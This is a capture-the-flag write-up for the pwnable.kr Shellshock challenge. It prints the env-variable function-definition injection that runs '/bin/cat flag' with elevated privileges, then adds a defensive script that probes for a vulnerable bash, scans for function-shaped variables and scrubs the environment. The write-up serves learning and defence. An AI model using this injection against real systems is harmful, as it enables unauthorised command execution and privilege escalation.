# 10 - Shellshock

## The Challenge

Mommy, there was a shocking news about bash. I bet you already know, but lets just make it sure :)

ssh shellshock@pwnable.kr -p2222 (pw:guest)

## The Solution

Let's look at the files.

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2Fsync%2Fd4f52bffaeadd9d9bf346165d2b96a5d0f588cab.png?generation=1600607684609298\&alt=media)

What is the purpose of this bash binary?

The binary is running with shellshock\_pwns privileges. What is it doing?

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2Fsync%2F45e471682c43b6346f914e12d34a2c199e63ce48.png?generation=1600607690515720\&alt=media)

It runs the bash binary with shellshock\_pwns privileges. What's so special about that bash? As the name of the challenge suggests, this bash is vulnerable to [shellshock](https://en.wikipedia.org/wiki/Shellshock_\(software_bug\)).

![](https://3609409146-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFKoejdbAjmSQIWMVBk%2Fsync%2Feaf52edb92bcc669d974fa215348bd7575ffdd67.png?generation=1600607688634735\&alt=media)

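Here is the solution for y'all. A vulnerable bash imports a function definition from any environment variable whose value begins with `() {`, and it also executes whatever follows the function body, so the trailing `/bin/cat flag` runs with the privileges the `shellshock` binary gives to bash: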

```
env x='() { :;}; /bin/cat flag' ./shellshock
```
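
The same behaviour seen from the defensive side, as an added example that is not part of the original write-up: a harmless probe for a bash binary, a scan for function-shaped environment values, and an environment-scrubbing launcher. The function names and the sample environment are constructed for illustration.

```shell
#!/bin/sh
# Added example: defensive Shellshock checks. Function names are illustrative.

# Return 0 if the bash at path $1 runs a command that trails a function
# definition passed in through the environment (the Shellshock behaviour).
is_shellshock_vulnerable() {
    # The trailing command only prints a marker; a patched bash never runs it.
    out=$(env -i probe='() { :;}; echo SHELLSHOCK_MARKER' "$1" -c true 2>/dev/null)
    case $out in
        *SHELLSHOCK_MARKER*) return 0 ;;
        *) return 1 ;;
    esac
}

# Read NAME=value lines on stdin and print the names whose value starts with
# "() {", the shape a vulnerable bash parses as a function definition.
find_function_shaped_vars() {
    while IFS= read -r line; do
        name=${line%%=*}
        value=${line#*=}
        case $value in
            '() {'*) printf '%s\n' "$name" ;;
        esac
    done
}

# Mitigation for a privileged launcher: start the child with an empty
# environment plus a fixed PATH, so no caller-supplied variable reaches bash.
run_scrubbed() {
    env -i PATH=/usr/bin:/bin "$@"
}

# Constructed sample environment (not captured from the challenge host).
sample_env() {
    printf '%s\n' 'HOME=/home/shellshock' 'x=() { :;}; /bin/cat flag' 'TERM=xterm'
}

sample_env | find_function_shaped_vars   # prints: x
```

`is_shellshock_vulnerable` takes the path of the bash binary to test; `find_function_shaped_vars` can be fed the output of `env` or a process environment converted to one variable per line.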
